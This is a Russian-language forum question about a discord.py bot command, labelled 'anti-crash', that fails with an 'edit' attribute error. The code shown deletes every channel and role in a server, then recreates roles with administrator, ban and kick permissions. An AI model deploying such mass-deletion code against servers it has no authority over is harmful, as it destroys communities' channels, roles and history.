# Discord.py: код перестал работать

Tags: python, python-3.x, бот, discord, discord.py

Написал код для *Discord* бота, который должен работать по типу анти-краша. Все работало, но через 3 дня, когда я открыл этот код снова и запустил, все перестало работать.

Вот часть кода:

```
@bot.command()
async def uncrash(ctx):
    author = ctx.message.author

    guild = ctx.guild
    for channel in guild.channels:
        await channel.delete()
        
    category = await ctx.guild.create_category("Удаление ролей, пожалуйста подождите", overwrites=None, reason=None)
    await category.create_text_channel(f"Удаление ролей, пожалуйста подождите", overwrites=None, reason=None)
        
    guild = ctx.guild
    for m in ctx.guild.roles:
            try:
                await m.delete(reason="F")
            except:
                pass
                
    guild = ctx.guild
    for channel in guild.channels:
        await channel.delete()

    category = await ctx.guild.create_category("Создание ролей, пожалуйста подождите", overwrites=None, reason=None)
    await category.create_text_channel(f"Создание ролей, пожалуйста подождите", overwrites=None, reason=None)
#9e23d7
    await ctx.guild.create_role(name="11", colour=discord.Colour(0x9e23d7))
    await ctx.guild.create_role(name="22", colour=discord.Colour(0xff0000))
    await ctx.guild.create_role(name="33", colour=discord.Colour(0xd6680e))
    await ctx.guild.create_role(name="44", colour=discord.Colour(0xdfa924))
    await ctx.guild.create_role(name="55", colour=discord.Colour(0x00cfd2))
    
    
    test = discord.utils.get(ctx.message.guild.roles, name = "11")
    perms = discord.Permissions(administrator = True)
    await test.edit(permissions = perms)

    testt = discord.utils.get(ctx.message.guild.roles, name = "22")
    perms = discord.Permissions(stream = True, speak = True, deafen_members = True, external_emojis = True, use_external_emojis = True, add_reactions = True, view_audit_log = True, manage_messages = True, send_messages = True, send_tts_messages = True, manage_nicknames = True, change_nickname = True, manage_roles = True, manage_emojis = True, use_voice_activation = True, move_members = True,  connect = True, read_message_history = True, mention_everyone = True, attach_files = True, manage_channels = True, ban_members = True, kick_members = True, create_instant_invite = True)                                                                            
    await testt.edit(permissions = perms)
    
    testtt = discord.utils.get(ctx.message.guild.roles, name = "33")
    perms = discord.Permissions(stream = True, speak = True, deafen_members = True, external_emojis = True, use_external_emojis = True, add_reactions = True, view_audit_log = True, manage_messages = True, send_messages = True, send_tts_messages = True, manage_nicknames = True, change_nickname = True, manage_roles = True, manage_emojis = True, use_voice_activation = True, move_members = True,  connect = True, read_message_history = True, mention_everyone = True, attach_files = True, manage_channels = True, ban_members = True, kick_members = True, create_instant_invite = True)                                                                            
    await testtt.edit(permissions = perms)

    testttt = discord.utils.get(ctx.message.guild.roles, name = "44")
    perms = discord.Permissions(stream = True, speak = True, deafen_members = True, external_emojis = True, use_external_emojis = True, add_reactions = True, view_audit_log = True, manage_messages = True, send_messages = True, send_tts_messages = True, manage_nicknames = True, change_nickname = True, manage_roles = True, manage_emojis = True, use_voice_activation = True, move_members = True,  connect = True, read_message_history = True, mention_everyone = True, attach_files = True, manage_channels = True, ban_members = True, kick_members = True, create_instant_invite = True)                                                                            
    await testttt.edit(permissions = perms)

    testtttt = discord.utils.get(ctx.message.guild.roles, name = "55")
    perms = discord.Permissions(stream = True, speak = True, deafen_members = True, external_emojis = True, use_external_emojis = True, add_reactions = True, view_audit_log = True, send_messages = True, send_tts_messages = True,  change_nickname = True, manage_roles = True, manage_emojis = True, use_voice_activation = True, move_members = True,  connect = True, read_message_history = True, mention_everyone = True, attach_files = True, manage_channels = True, ban_members = True, kick_members = True, create_instant_invite = True)                                                                            
    await testtttt.edit(permissions = perms)
    
    
    guild = ctx.guild
    for channel in guild.channels:
        await channel.delete()
    
    
    

  
    category = await ctx.guild.create_category("TEST", overwrites=None, reason=None)
    await category.create_text_channel(f"1", overwrites=None, reason=None)
    await category.create_text_channel(f"2", overwrites=None, reason=None)
    await category.create_text_channel(f"3", overwrites=None, reason=None)
```

**Ошибка:** `не найден атрибут edit`

Comment: не могу понять в чем ошибка

Comment: Ошибка в том что, на пример, в `test` нету атрибута `edit`, почитайте внимательней документацию по изменении сообщения.

Comment: по какому изменению сообщения?

Comment: я изменяю не сообщение а права для роли